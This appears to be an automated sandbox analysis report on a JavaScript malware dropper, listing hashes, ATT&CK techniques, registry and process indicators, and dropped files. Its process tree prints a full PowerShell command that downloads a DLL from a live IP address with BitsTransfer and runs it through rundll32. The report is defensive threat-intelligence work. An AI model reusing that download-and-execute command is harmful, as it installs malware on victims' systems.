9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330

General

Target

9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330 (1).js
Size

134KB
MD5

1f2912c0c12b316023061de20ee3cc55
SHA1

05cad925852e41a0832bc9bf3db5056990d027d4
SHA256

9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330
SHA512

226d9de84f0a3624e8b84ec3f89026299d457907faab3246694b04de40af76d927561ccbf463444e5049dd55ac2a72f4e727c6e10f4a490604c01738142c7f5b
SSDEEP

1536:BIscHpcWN6ns7eemQA1iPFmpcEo0SlWu37kxlvtqMPeHp6o:5cHDesSemV1iQWEo0SlWA7Alvtl8f

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.49.69.41/data/b413842a6f5f431ab839f99fe3f6d3a9

Signatures

Blocklisted process makes network request 13 IoCs

Processes:

rundll32.exe

flow	pid	process
47	4248	rundll32.exe
49	4248	rundll32.exe
50	4248	rundll32.exe
51	4248	rundll32.exe
52	4248	rundll32.exe
53	4248	rundll32.exe
55	4248	rundll32.exe
56	4248	rundll32.exe
57	4248	rundll32.exe
58	4248	rundll32.exe
59	4248	rundll32.exe
64	4248	rundll32.exe
65	4248	rundll32.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	wscript.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

4248 rundll32.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops file in System32 directory 1 IoCs

Processes:

rundll32.exe

description ioc process

File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\ZIBYF9XW.htm rundll32.exe
Drops file in Windows directory 1 IoCs

Processes:

rundll32.exe

description ioc process

File created C:\Windows\Tasks\RtlCpl.job rundll32.exe
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3524 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4248	rundll32.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\ZIBYF9XW.htm	rundll32.exe

description	ioc	process
File created	C:\Windows\Tasks\RtlCpl.job	rundll32.exe

pid	process
3524	powershell.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

rundll32.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

1680 powershell.exe
1680 powershell.exe
1680 powershell.exe
3524 powershell.exe
3524 powershell.exe
3524 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1680 powershell.exe
Token: SeDebugPrivilege 3524 powershell.exe

pid	process
1680	powershell.exe
1680	powershell.exe
1680	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1680	powershell.exe
Token: SeDebugPrivilege	3524	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

wscript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3400 wrote to memory of 1680	3400	wscript.exe	powershell.exe
PID 3400 wrote to memory of 1680	3400	wscript.exe	powershell.exe
PID 1680 wrote to memory of 3524	1680	powershell.exe	powershell.exe
PID 1680 wrote to memory of 3524	1680	powershell.exe	powershell.exe
PID 3524 wrote to memory of 2364	3524	powershell.exe	rundll32.exe
PID 3524 wrote to memory of 2364	3524	powershell.exe	rundll32.exe

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330 (1).js"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://185.49.69.41/data/b413842a6f5f431ab839f99fe3f6d3a9' -Destination $d; if (![System.IO.File]::Exists($d)) {exit}; $p = $d + ',Start'; rundll32.exe $p; Start-Sleep -Seconds 10} -Argument 0 | wait-job | Receive-Job"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3524

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\hlxfhdqd.ob4,Start
4⤵
- Drops file in Windows directory
PID:2364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3976 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8
1⤵
PID:4632

C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe "C:\ProgramData\RtlCpl\RtlCpl.dll",Start /p
1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4248

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

PowerShell

1

T1059.001

JavaScript

1

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RtlCpl\RtlCpl.dll
Filesize
59KB

MD5
59fcd8a54f43d911fc7a8945e07b0246

SHA1
759fcbf9f7a7d2ec42f938e0c69acfc07c682a97

SHA256
1bcfed8b593a8a7c8b34e074aca3d4fc68a0ea3343b32eae89fdabf35ad40e7d

SHA512
6d67da2334a4e2e4f4c615d8661a5df2be3fc5467f5636760c15322c3abe5cfe1df339b29dfa008362f6e34b8afad44aef6858eb8aa1cae9c2b0dc7cc2ba7332

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ieymjob3.dqx.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1680-14-0x00000209A89C0000-0x00000209A8B36000-memory.dmp

Filesize
1.5MB

Download
memory/1680-3-0x000002098FCD0000-0x000002098FCF2000-memory.dmp

Filesize
136KB

Download
memory/1680-2-0x00007FFE89A50000-0x00007FFE8A511000-memory.dmp

Filesize
10.8MB

Download
memory/1680-13-0x00007FFE89A50000-0x00007FFE8A511000-memory.dmp

Filesize
10.8MB

Download
memory/1680-0-0x00007FFE89A53000-0x00007FFE89A55000-memory.dmp

Filesize
8KB

Download
memory/1680-15-0x00000209A8D50000-0x00000209A8F5A000-memory.dmp

Filesize
2.0MB

Download
memory/1680-30-0x00007FFE89A50000-0x00007FFE8A511000-memory.dmp

Filesize
10.8MB

Download
memory/1680-1-0x00007FFE89A50000-0x00007FFE8A511000-memory.dmp

Filesize
10.8MB

Download
memory/2364-31-0x00007FFE8F660000-0x00007FFE8F677000-memory.dmp

Filesize
92KB

Download
memory/3524-25-0x0000023E74910000-0x0000023E74936000-memory.dmp

Filesize
152KB

Download
memory/3524-26-0x0000023E74970000-0x0000023E74984000-memory.dmp

Filesize
80KB

Download
memory/4248-38-0x00007FFEA3700000-0x00007FFEA3717000-memory.dmp

Filesize
92KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads